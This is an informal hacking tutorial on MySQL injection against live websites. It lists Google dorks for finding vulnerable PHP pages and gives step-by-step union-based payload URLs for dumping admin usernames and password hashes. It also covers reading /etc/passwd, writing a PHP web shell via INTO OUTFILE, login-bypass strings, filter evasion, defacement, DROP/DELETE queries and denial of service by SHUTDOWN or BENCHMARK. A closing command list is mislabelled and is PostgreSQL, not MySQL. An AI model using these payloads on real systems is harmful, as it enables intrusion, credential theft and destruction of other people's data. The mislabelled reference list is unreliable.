1MY SQL TUT
2
3
4Step 1) Finding a (maybe) vulnerable site (Dorks)
5
6
7inurl:trainers.php?id=
8inurl:buy.php?category=
9inurl:article.php?ID=
10inurl:play_old.php?id=
11inurl:declaration_more.php?decl_id=
12inurl:pageid=
13inurl:games.php?id=
14inurl:page.php?file=
15inurl:newsDetail.php?id=
16inurl:gallery.php?id=
17inurl:article.php?id=
18inurl:show.php?id=
19inurl:staff_id=
20inurl:newsitem.php?num=
21inurl:readnews.php?id=
22inurl:top10.php?cat=
23inurl:historialeer.php?num=
24inurl:reagir.php?num=
25inurl:Stray-Questions-View.php?num=
26inurl:forum_bds.php?num=
27inurl:game.php?id=
28inurl:view_product.php?id=
29inurl:newsone.php?id=
30inurl:sw_comment.php?id=
31inurl:news.php?id=
32inurl:avd_start.php?avd=
33inurl:event.php?id=
34inurl:product-item.php?id=
35inurl:sql.php?id=
36inurl:news_view.php?id=
37inurl:select_biblio.php?id=
38inurl:humor.php?id=
39inurl:aboutbook.php?id=
40inurl:ogl_inet.php?ogl_id=
41inurl:fiche_spectacle.php?id=
42inurl:communique_detail.php?id=
43inurl:sem.php3?id=
44inurl:kategorie.php4?id=
45inurl:news.php?id=
46inurl:index.php?id=
47inurl:faq2.php?id=
48inurl:show_an.php?id=
49inurl:preview.php?id=
50inurl:loadpsb.php?id=
51inurl:opinions.php?id=
52inurl:spr.php?id=
53inurl:pages.php?id=
54inurl:announce.php?id=
55inurl:clanek.php4?id=
56inurl:participant.php?id=
57inurl:download.php?id=
58inurl:main.php?id=
59inurl:review.php?id=
60inurl:chappies.php?id=
61inurl:read.php?id=
62inurl:prod_detail.php?id=
63inurl:viewphoto.php?id=
64inurl:article.php?id=
65inurl:person.php?id=
66inurl:productinfo.php?id=
67inurl:showimg.php?id=
68inurl:view.php?id=
69inurl:website.php?id=
70inurl:hosting_info.php?id=
71inurl:gallery.php?id=
72inurl:rub.php?idr=
73inurl:view_faq.php?id=
74inurl:artikelinfo.php?id=
75inurl:detail.php?ID=
76inurl:index.php?=
77inurl:profile_view.php?id=
78inurl:category.php?id=
79inurl:publications.php?id=
80inurl:fellows.php?id=
81inurl:downloads_info.php?id=
82inurl:prod_info.php?id=
83inurl:shop.php?do=part&id=
84inurl:productinfo.php?id=
85inurl:collectionitem.php?id=
86inurl:band_info.php?id=
87inurl:product.php?id=
88inurl:releases.php?id=
89inurl:ray.php?id=
90inurl:produit.php?id=
91inurl:pop.php?id=
92inurl:shopping.php?id=
93inurl:productdetail.php?id=
94inurl:post.php?id=
95inurl:viewshowdetail.php?id=
96inurl:clubpage.php?id=
97inurl:memberInfo.php?id=
98inurl:section.php?id=
99inurl:theme.php?id=
100inurl:page.php?id=
101inurl:shredder-categories.php?id=
102inurl:tradeCategory.php?id=
103inurl:product_ranges_view.php?ID=
104inurl:shop_category.php?id=
105inurl:transcript.php?id=
106inurl:channel_id=
107inurl:item_id=
108inurl:newsid=
109inurl:trainers.php?id=
110inurl:news-full.php?id=
111inurl:news_display.php?getid=
112inurl:index2.php?option=
113inurl:readnews.php?id=
114inurl:top10.php?cat=
115inurl:newsone.php?id=
116inurl:event.php?id=
117inurl:product-item.php?id=
118inurl:sql.php?id=
119inurl:aboutbook.php?id=
120inurl:preview.php?id=
121inurl:loadpsb.php?id=
122inurl:pages.php?id=
123inurl:material.php?id=
124inurl:clanek.php4?id=
125inurl:announce.php?id=
126inurl:chappies.php?id=
127inurl:read.php?id=
128inurl:viewapp.php?id=
129inurl:viewphoto.php?id=
130inurl:rub.php?idr=
131inurl:galeri_info.php?l=
132inurl:review.php?id=
133inurl:iniziativa.php?in=
134inurl:curriculum.php?id=
135inurl:labels.php?id=
136inurl:story.php?id=
137inurl:look.php?ID=
138inurl:newsone.php?id=
139inurl:aboutbook.php?id=
140inurl:material.php?id=
141inurl:opinions.php?id=
142inurl:announce.php?id=
143inurl:rub.php?idr=
144inurl:galeri_info.php?l=
145inurl:tekst.php?idt=
146inurl:newscat.php?id=
147inurl:newsticker_info.php?idn=
148inurl:rubrika.php?idr=
149inurl:rubp.php?idr=
150inurl:offer.php?idf=
151inurl:art.php?idm=
152inurl:title.php?id=
153buy.php?category=
154article.php?ID=
155play_old.php?id=
156declaration_more.php?decl_id=
157Pageid=
158games.php?id=
159page.php?file=
160newsDetail.php?id=
161gallery.php?id=
162article.php?id=
163play_old.php?id=
164show.php?id=
165staff_id=
166newsitem.php?num=
167readnews.php?id=
168top10.php?cat=
169historialeer.php?num=
170reagir.php?num=
171forum_bds.php?num=
172game.php?id=
173view_product.php?id=
174newsone.php?id=
175sw_comment.php?id=
176news.php?id=
177avd_start.php?avd=
178event.php?id=
179product-item.php?id=
180sql.php?id=
181news_view.php?id=
182select_biblio.php?id=
183humor.php?id=
184aboutbook.php?id=
185fiche_spectacle.php?id=
186communique_detail.php?id=
187sem.php3?id=
188kategorie.php4?id=
189faq2.php?id=
190show_an.php?id=
191preview.php?id=
192loadpsb.php?id=
193opinions.php?id=
194spr.php?id=
195pages.php?id=
196announce.php?id=
197clanek.php4?id=
198participant.php?id=
199download.php?id=
200main.php?id=
201review.php?id=
202chappies.php?id=
203read.php?id=
204prod_detail.php?id=
205viewphoto.php?id=
206article.php?id=
207play_old.php?id=
208declaration_more.php?decl_id=
209category.php?id=
210publications.php?id=
211fellows.php?id=
212downloads_info.php?id=
213prod_info.php?id=
214shop.php?do=part&id=
215Productinfo.php?id=
216website.php?id=
217Productinfo.php?id=
218showimg.php?id=
219view.php?id=
220rub.php?idr=
221view_faq.php?id=
222artikelinfo.php?id=
223detail.php?ID=
224collectionitem.php?id=
225band_info.php?id=
226product.php?id=
227releases.php?id=
228ray.php?id=
229produit.php?id=
230pop.php?id=
231shopping.php?id=
232productdetail.php?id=
233post.php?id=
234viewshowdetail.php?id=
235clubpage.php?id=
236memberInfo.php?id=
237section.php?id=
238theme.php?id=
239page.php?id=
240shredder-categories.php?id=
241tradeCategory.php?id=
242shop_category.php?id=
243transcript.php?id=
244channel_id=
245item_id=
246newsid=
247trainers.php?id=
248buy.php?category=
249article.php?ID=
250play_old.php?id=
251iniziativa.php?in=
252detail_new.php?id=
253tekst.php?idt=
254newscat.php?id=
255newsticker_info.php?idn=
256rubrika.php?idr=
257rubp.php?idr=
258offer.php?idf=
259hotel.php?id=
260art.php?idm=
261title.php?id=
262look.php?ID=
263story.php?id=
264labels.php?id=
265review.php?id=
266chappies.php?id=
267news-full.php?id=
268news_display.php?getid=
269index2.php?option=
270ages.php?id=
271"id=" & intext:"Warning: mysql_fetch_assoc()
272"id=" & intext:"Warning: mysql_fetch_array()
273"id=" & intext:"Warning: mysql_num_rows()
274"id=" & intext:"Warning: session_start()
275"id=" & intext:"Warning: getimagesize()
276"id=" & intext:"Warning: Unknown()
277"id=" & intext:"Warning: pg_exec()
278"id=" & intext:"Warning: array_merge()
279"id=" & intext:"Warning: mysql_result()
280"id=" & intext:"Warning: mysql_num_rows()
281"id=" & intext:"Warning: mysql_query()
282"id=" & intext:"Warning: filesize()
283"id=" & intext:"Warning: require()
284
285
286***********************************************************************************************************
287Assume site found = http://www.xxxxx.com/index.php?catid=1
288************************************************************************************************************
289Step 2) Testing if vulnerable
290
291
292Method 1 ) test with this
293
294 http://www.xxxxx.com/index.php?catid=1' (should return an error page)
295 http://www.xxxxx.com/index.php?catid='1 (should return an error page)
296
297 Method2 ) Test with this
298
299 http://ww.xxxxx.com/index.php?page=2-1
300
301 NOTE: if both of the above give the same error page, the target is most likely vulnerable
302
303 In the case where you find a website such as this:
304
305Code:
306http://www.site.com/buy.php?id=1&dog;catid=2
307
308Then you must use the same technique of adding a ', except it must go between the value (in this case the number) and the operator (the "=" sign), so it looks like this:
309
310Code:
311http://www.site.com/buy.php?id='1&dog;catid='2
312
313 Magic Quotes prevents quotes from being used in injections by converting the ' (original quote) to either \' (backslash-escaped quote) or '' (doubled quote).
314
315http://site.com/script.php?id=1 or 1=1 /*
316
317 http://site.com/script.php?id=1 or '1'='1' --
318
319 http://site.com/script.php?id=1' or 1=1 --
320
321 Subsection 2.3 - Step 2) Check for magic quotes
322
323We know from our example before that magic quotes are off because we used ' to end the WHERE clause and it gave no error, but let's pretend our first try worked, http://site.com/script.php?id=1 or 1=1 --, so we're not sure if ' causes an error or not. We need to know if magic quotes is on because if we want to use a function like load_file to steal files (discussed later), or choose data where the user = 'admin', we need to be able to use 's, so magic quotes MUST be off.
324
325To find out if they're on, we would try:
326
327http://site.com/script.php?id=1 or '1'='1' --
328
329If you get an error like:
330
331"Error in MySQL Syntax by '\'1\'=\'1\''. in script.php on line 7."
332
333or
334
335"Error in MySQL Syntax by '''1''=''1'''. in script.php on line 7."
336
337then you would see that magic quotes are on, since it's adding \s or an extra ' to the ' you put in. Then you would not be able to steal files if load_file was enabled or choose certain data using WHERE (there is a way to get around it which I will discuss later, but it doesn't work for load_file, just WHERE and other functions discussed later like concat)
338
339Now if you get no error, you know magic_quotes are off and you have an even bigger advantage. That was easy, wasn't it? Now let's move on.
340
341 ************************************************************************************************************
342 Getting Number of Columns
343
344 Method 1)
345http://www.example.com/index.php?id=3 ORDER BY (number)--
346 OR
347http://www.tartanarmy.com/news/news.php?id=130 order by 3
348
349where 'number' goes from 1 up to the value at which you get an error page
350
351
352
353http://www.example.com/index.php?id=3 order by 1--
354http://www.example.com/index.php?id=3 order by 2--
355http://www.example.com/index.php?id=3 order by 3--
356http://www.example.com/index.php?id=3 order by 4--
357http://www.example.com/index.php?id=3 order by 5--
358http://www.example.com/index.php?id=3 order by 6--
359http://www.example.com/index.php?id=3 order by 7--
360http://www.example.com/index.php?id=3 order by 8--
361
362Let's say on order by 8-- you get an error page. This means that the website has 7 columns because
363it will give you errors on anything over 7.
364
365************************************************************************************************************
366Finding Accessible Columns
367
368http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
369 OR
370http://www.example.com/index.php?id=3+UNION+SELECT+1,2,3,4,5,6,7--
371 OR
372http://www.example.com/index.php?id=-3 UNION SELECT 1,2,3,4,5,6,7--
373 OR
374 http://www.example.com/index.php?id=-3 UNION SELECT 1,2,3,4,5,6,7 /*
375 OR
376 http://www.site.com/news.php?id=5 union all select 1,2,3/*
377 OR
378http://www.site.ru/index.php?page=-1 union + + + select null, null / * (where nmber of "nulls' are num of columns" )
379 OR
380http://www.site.ru/index.php?page=99999 union + + + select null, null / *
381 OR
382http://www.so-and-so.com/gallery.php?id=-170 /*union*/ /*all*/ /*select*/ 1,2,3,4,5,6,7,8,9,10--
383
384where 7 is the last column we found in the above process.
385with these we will see a fucked up page with some numbers written on it like 2,3 ... 2,5 whatever. These are the columns we can modify and extract data from
386
387
388
389************************************************************************************************************
390Finding MySQL Database Version
391
392the column we found exploitable above is replaced by @@version or version()
393
394http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--
395
396http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--
397
398if we get a version <5 then we will have to guess the table name and columns; if >5 we can get them easily
399
400if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
401then what we need is the convert() function
402
403http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
404
405or with hex() and unhex()
406
407http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
408
409http://site.com/script.php?id=1' and substr(@@version,1)>3 --
410************************************************************************************************************
411Finding Database Names
412
413http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--
414
415http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
416
417
418************************************************************************************************************
419TIP - we can also find the version and database by the following:
420where TEST is an assumed table name; we then get an error message containing the database name
421
422
423http://www.example.com/index.php?id=-3+UNION+SELECT+version,database(),3,4,5,6,7 FROM TEST--
424
425http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *
426
427http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *
428
429http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *
430
431
432http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
433
434http://www.site.ru/index.php?page=-1+ union + +1.2 select, name, passwd, 4,5,6 + + from users / *
435************************************************************************************************************
436Finding Table Names
437
438
439
440for version >5
441http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--
442 OR
443http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
444
445 Now we must add LIMIT to the end of the query to list out all tables.
446
447http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
448
449note that I put 0,1 (get 1 result starting from the 0th)
450
451now to view the second table, we change limit 0,1 to limit 1,1
452
453http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
454
455the second table is displayed.
456
457http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
458
459See where it says tar_admin? That's what we want. But how are we going to get the info that's in there? Like this. *If you downloaded the HackBar, like I told you to, you're going to need it*
460Code:
461
462http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--
463
464http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= tar_admin
465So, tar_admin is what we want to get into, but putting it in just like that won't work. We need to convert it into CHAR(). The HackBar can do that. Highlight what you want to turn into CHAR() and click MySQL, then MYSQL CHAR().
466Code:
467tar_admin = CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
468
469So the whole thing is :
470Code:
471http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
472
473********************************
474for version < 5 we have to guess table name
475common table names are: user/s, admin/s, member/s ...
476
477http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
478
479(we see number 2 on the screen like before, and that's good :D) we know that table admin exists...
480
481
482************************************************************************************************************
483Finding Column Names
484
485for version > 5
486
487http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
488 OR
489http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
490http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
491
492sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--
493
494http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= tar_admin
495
496http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--
497
498So, tar_admin is what we want to get into, but putting it in just like that won't work. We need to convert it into CHAR(). The HackBar can do that. Highlight what you want to turn into CHAR() and click MySQL, then MYSQL CHAR().
499Code:
500tar_admin = CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
501
502So the whole thing is :
503Code:
504http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
505
506*****************************************
507for version < 5
508
509common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
510
511
512http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
513
514we get username displayed on screen, example would be admin, or superadmin etc...
515
516now to check if column password exists
517
518http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
519
520we see the password on the screen as a hash or in plain text; it depends on how the database is set up :)
521
522when you have this, you can login like admin or some superuser :D
523
524************************************************************************************************************
525TIP:
526
527if you can't guess the right table name, you can always try mysql.user (default)
528
529it has user and password columns, so an example would be
530
531http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
532*****************************************
533
534if you want to display column names for a specific table, use this query (with a WHERE clause).
535let's say that we found table users.
536
537http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
538
539Note that this won't work if the magic quotes is ON.
540
541let's say that we found columns user, pass and email.
542
543now to complete query to put them all together :D
544
545for that we use concat(), which I described earlier.
546
547http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
548
549************************************************************************************************************
550pull information
551
552http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--
553
554
555EX: http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--
556
557
558
559
560http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
561
562Note that I put 0x3a, the hex value for : (so 0x3a is the hex value for a colon)
563
564(there is another way to do that: char(58), the ASCII value for : )
565
566
567 sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --
568 **************************************************************************************************************************************************
569
5703) Read files on the server
571If we have the right file_priv we can read the files on the server
572check with the user to visualize which mysqld. To do so, we will help LOAD_FILE () function. Example:
573
574
575Code:
576
577http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE ( '/ etc / passwd'), 4,5,6 / *
578
5794) Get a shell
580Immediately I say that for this we need to know the location checked-out site. Drawing up a request to file recordable shell. Let mouth. dirrektoriya "/ home / site / public_html /"
581Then, a query is:
582
583
584Code:
585
586http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5, '<? php system ($ _GET [cmd]);>' + + + from mysql.user into outfile + + '/ home / site / public_html / shell.php' / *
587
588Here, indeed all of the major steps that can be done with MySQL Inj. All that I can add more, so that, for example, can be controlled number of outgoing HELPED table with the command limit.
589Syntax: limit shift, QTY
590Exapmle: union select 1.2, user, pass, from 5,6 + + + users limit +5.3 / * [/ i]
591As a result which will return to 3 entry, beginning with the fifth
592
593
594Secrets and the nuances
595filtering Workaround:
596For example, I sometimes met with the fact that variable with mysql inj filtered so that the expression, in the name field, I can not use the letters. This, I bypassed this way:
597
598
599
600Code:
601
602http://www.site.ru/index.php?page=-1 + union + +1.2 select, AES_DECRYPT (AES_ENCRYPT (USER (), 0x71), 0x71), 4,5,6 / *
603
604It worked successfully.
605
606
607
608http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE (char (47101116,99,47112,97115115119100)), 4,5,6 / *
609
610
611http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
612
613http://www.site.ru/index.php?page=-1/ ** / union / ** / select / ** / 1.2, user, password, 5.6 / ** / from / * * / mysql.user / *
614
615
616
617DOS
618
619http://www.site.ru/index.php?page=-1 + BENCHMARK (10000000, BENCHMARK (10000000 md
620
621other way
622
623http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
624http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
625
626http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
627
628where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
629then once u have the right table name you should get the administrator password
630then just do the same thing but type username instead of password
631sometimes the password is hashed and you need to crack it.
632then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de.com/c0de/perl/admin_1.2_.txt
633now if the database is version 5 or up
634type
635http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
636and that will display a list of all the tables
637once you have your table name
638type the same thing as 4
639http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
640then the same with username
641 **********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
642
643
644 Tut 2
645
646 AT very weak site
647
648 with admin pages
649
650 "inurl:admin.asp"
651"inurl:login/admin.asp"
652"inurl:admin/login.asp"
653"inurl:adminlogin.asp"
654"inurl:adminhome.asp"
655"inurl:admin_login.asp"
656"inurl:administratorlogin.asp"
657"inurl:login/administrator.asp"
658"inurl:administrator_login.asp"
659
660so what we do here is in the username we always type "Admin"
661and for our password we type our sql injection
662
663here is a list of sql injections
664
665' or '1'='1
666' or 'x'='x
667' or 0=0 --
668" or 0=0 --
669or 0=0 --
670' or 0=0 #
671" or 0=0 #
672or 0=0 #
673' or 'x'='x
674" or "x"="x
675') or ('x'='x
676' or 1=1--
677" or 1=1--
678or 1=1--
679' or a=a--
680" or "a"="a
681') or ('a'='a
682") or ("a"="a
683hi" or "a"="a
684hi" or 1=1 --
685hi' or 1=1 --
686'or'1=1'
687
688
689 ****************************************************************************************************************************
690 example table names
691
692 archives,articles,articles2,digest,edition,events,links,nomination,sections,staff,survey
693
694 example column name
695 id,date,title,by,abstract,body,section,keywords,photo,id,date,title,author,abstract,body,section,keywords,
696photo,caption,caption2,caption3,caption4,lead,id,date,title,author,abstract,body,section,keywords,photo,
697caption,caption2,caption3,caption4,lead,id,date,title,city,body,id,volume,number,date,id,title,body,
698month,day,year,date,time,time2,location,cost,contact,phone,email,url,approved,id,url,title,category,
699description,id,date,nominator,nominatortitle,nominatorcompany,nominatoraddress,nominatorcity,
700nominatorstate,nominatorzip,nominatorphone,nominatorfax,nominatoremail,nomineecompany,nomineeaddress,
701nomineecity,nomineestate,nomineezip,nomineephone,nomineefax,nomineeweb,reason,reasonother,sat1,sat2,sat3,
702sat4,sat5,ethics1,ethics2,ethics3,ethics4,contrib1,contrib2,contrib3,contrib4,dev1,dev2,dev3,dev4,dev5,
703dev6,dev7,dev8,dev9,lead1,lead2,lead3,lead4,lead5,lead6,quality1,quality2,contact1name,contact1title,
704contact1phone,contact1email,contact2name,contact2title,contact2phone,contact2email,contact3name,
705contact3title,username, user, usr, user_name, password, pass, passwd, pwd
706
707 ****************************************************************************************************************************
708
709 ****************************************************************************************************************************
710
711
712 ********************************************************
713
714
715 CTD...
716MODIFYING SITE CONTENT:
717Sometimes, u find the vulnerable site and get everything you need to know, but maybe the admin login doesn't exist or it is only accessible from a certain IP range. Even in that context, u can use some kewl SQL commands for modifying the site content. I haven't seen many articles addressing this one so I thought to include it here.
718Here, I will basically talk about a few SQL commands u may use to change the site content. These commands are the workhorse of MySQL & are deadly when executed.
719First let me list these commands:
720UPDATE: It is used to edit infos already in the db without deleting any rows.
721DELETE: It is used to delete the contents of one or more fields.
722DROP: It is used to completely delete a table & all its associated data.
723Now, u could have figured out that these commands can be very destructive if the site lets us interact with the db with no sanitization & proper permissions.
724Command Usage:
725UPDATE: Our vulnerable page is:
726http://www.site.com/article.php?id=5
727Lets say the query is:
728SELECT title,data,author FROM article WHERE id=5
729Though in reality, we don't know the query as above, we can find the table and column name as discussed earlier.
730So we would do:
731www.site.com/article.php?id=5 UPDATE article SET title='Hacked By PinningYou'/*
732or, u could alternatively do:
733www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY PinningYou',data='Ur site has zero
734security',author='sam207'/*
735
736By executing first query, we have set the title value as 'Hacked By sam207' in the table article while in second query, we have updated all three fields title, data, & author in the table article.
737Sometimes, u may want to change the specific page with id=5. For this u will do:
738www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
739
740DELETE: As already stated, this deletes the content of one or more fields permanently from the db server.
741The syntax is:
742www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
743or if u want to delete these fields from the id=5, u will do:
744www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
745
746DROP:This is another deadly command u can use. With this, u can delete a table & all its associated data.
747For this, we make our URL as:
748www.site.com/article.php?id=5 DROP TABLE article/*
749This would delete table article & all its contents.
750
751Finally, I want to say a little about ;
752Though I have not used this in my tutorial, u can use it to end ur first query and start another one.
753This ; can be kept at the end of our first query so that we can start new query after it.
754CTD...
755SHUTTING DOWN MySQL SERVER:
756This is like DoSing the server as it will make the MySQL resources unavailable for the legitimate users or site visitors... For this, you will be using: SHUTDOWN WITH NOWAIT;
757So, you would craft a query which would execute the above command...
758For example, in my case, I would do the following:
759www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
760WOW! the MySQL server is down... This would prevent legitimate users & site visitors from using or viewing MySQL resources...
761
762LOADFILE:
763MySQL has a function called load_file which you can use to your benefit again.. I have not seen many sites where I could use this function... I think we should have MySQL root privilege for this.... Also, the magic quotes should be off for this.. But there is a way to get past the magic quotes... load_file can be used to load certain files of the server such as .htaccess, .htpasswd, etc.. & also password files like etc/passwd, etc..
764Do something like below:
765www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
766
767But sometimes, you will have to hex the part & do something like below:
768www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)
769where I have hexed... Now, if we are lucky, the scriptblock would echo the etc/passwd in the result..
770
771MySQL ROOT:
772If the MySQL version is 5 or above, we might be able to gain MySQL root privilege which will again be helpful for us.. MySQL servers from version 5 have a table called mysql.user which contains the hashes & usernames for login... It is in the user table of the mysql database which ships with every installation of MySQL..
773For this, you will do:
774www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*
775
776Now you will get the usernames & hashes.. The hash is mysqlsha1... Quick note: JTR won't crack it.. But http://www.insidepro.com has one to do it..
777CTD...
778FINALIZING THE INJECTION TUTORIAL:
779I know I have missed some things like outfile, WHERE clause, blind injection,etc... If I get time, I would try to update the tutorial with these.. Also for all sql injectors, think in a broad way.. & hexing is an important part in sql injection.. Sometimes the things that can't be done with normal ways can be done by using the hex part.. & be sure to try things with char(), hex() functions.. With these, you can bypass magic quotes on the server.. Again, within the UNION statement, you may try to use the XSS which would be sometimes helpful for you..
780www.site.com/article.php?id=5 UNION ALL SELECT <scblockedript>alert("XSS via SQL injection");</scblockedript>,2/*
781Again in the above injection, you may require to hex up the javascriptblock part for bypassing the magic quotes..
782Also for starters & those who know only a little, you may set up a MySQL server & configure PHP for your Apache server on your localhost, where you can try different things..
783In the command line interface of MySQL, try the various commands listed below.. Try modifying them... This would help you improve your MySQL command knowledge.. Also try to see how PHP code interacts with the MySQL server.. For example, install some free forums like PHPBB, SMF, etc.. or some content management system, as it would help you in two ways.. First, you would learn how PHP interacts with MySQL.. You may check the MySQL folder to see what changes have occurred after installing them.. What would happen if I do this? or that?? etc..etc.. Second, you may be able to find bugs in them.. like rfi in some part of the code or sql injection in another part or maybe csrf injection, etc.. That would help you to learn new things because, as you all know, practice makes perfect...
784CTD
785MAJOR MySQL COMMANDS:
786Below, I list some major MySQL commands that might help you a lot... Play with them in different ways by setting up a MySQL server on your own computer..
787All the commands here are copy-pasted from the post at http://www.h4cky0u.org & the credit for this part goes to the original author.. This is the only part which I didn't write myself.. I could have, but since there is a better one, I thought to put the same part here.. Thanks to whoever posted this on the h4cky0u site.. & also full credits to him/her for this part.. (Note: the list below matches the PostgreSQL SQL command reference rather than MySQL's — statements such as VACUUM, LISTEN/NOTIFY, CLUSTER, CREATE RULE and SET SESSION AUTHORIZATION are not MySQL statements, so check the MySQL reference manual before relying on any entry.)
788ABORT -- abort the current transaction
789ALTER DATABASE -- change a database
790ALTER GROUP -- add users to a group or remove users from a group
791ALTER TABLE -- change the definition of a table
792ALTER TRIGGER -- change the definition of a trigger
793ALTER USER -- change a database user account
794ANALYZE -- collect statistics about a database
795BEGIN -- start a transaction block
796CHECKPOINT -- force a transaction log checkpoint
797CLOSE -- close a cursor
798CLUSTER -- cluster a table according to an index
799COMMENT -- define or change the comment of an object
800COMMIT -- commit the current transaction
801COPY -- copy data between files and tables
802CREATE AGGREGATE -- define a new aggregate function
803CREATE CAST -- define a user-defined cast
804CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
805CREATE CONVERSION -- define a user-defined conversion
806CREATE DATABASE -- create a new database
807CREATE DOMAIN -- define a new domain
808CREATE FUNCTION -- define a new function
809CREATE GROUP -- define a new user group
810CREATE INDEX -- define a new index
811CREATE LANGUAGE -- define a new procedural language
812CREATE OPERATOR -- define a new operator
813CREATE OPERATOR CLASS -- define a new operator class for indexes
814CREATE RULE -- define a new rewrite rule
815CREATE SCHEMA -- define a new schema
816CREATE SEQUENCE -- define a new sequence generator
817CREATE TABLE -- define a new table
818CREATE TABLE AS -- create a new table from the results of a query
819CREATE TRIGGER -- define a new trigger
820CREATE TYPE -- define a new data type
821CREATE USER -- define a new database user account
822CREATE VIEW -- define a new view
823DEALLOCATE -- remove a prepared query
824DECLARE -- define a cursor
825DELETE -- delete rows of a table
826DROP AGGREGATE -- remove a user-defined aggregate function
827DROP CAST -- remove a user-defined cast
828DROP CONVERSION -- remove a user-defined conversion
829DROP DATABASE -- remove a database
830DROP DOMAIN -- remove a user-defined domain
831DROP FUNCTION -- remove a user-defined function
832DROP GROUP -- remove a user group
833DROP INDEX -- remove an index
834DROP LANGUAGE -- remove a user-defined procedural language
835DROP OPERATOR -- remove a user-defined operator
836DROP OPERATOR CLASS -- remove a user-defined operator class
837DROP RULE -- remove a rewrite rule
838DROP SCHEMA -- remove a schema
839DROP SEQUENCE -- remove a sequence
840DROP TABLE -- remove a table
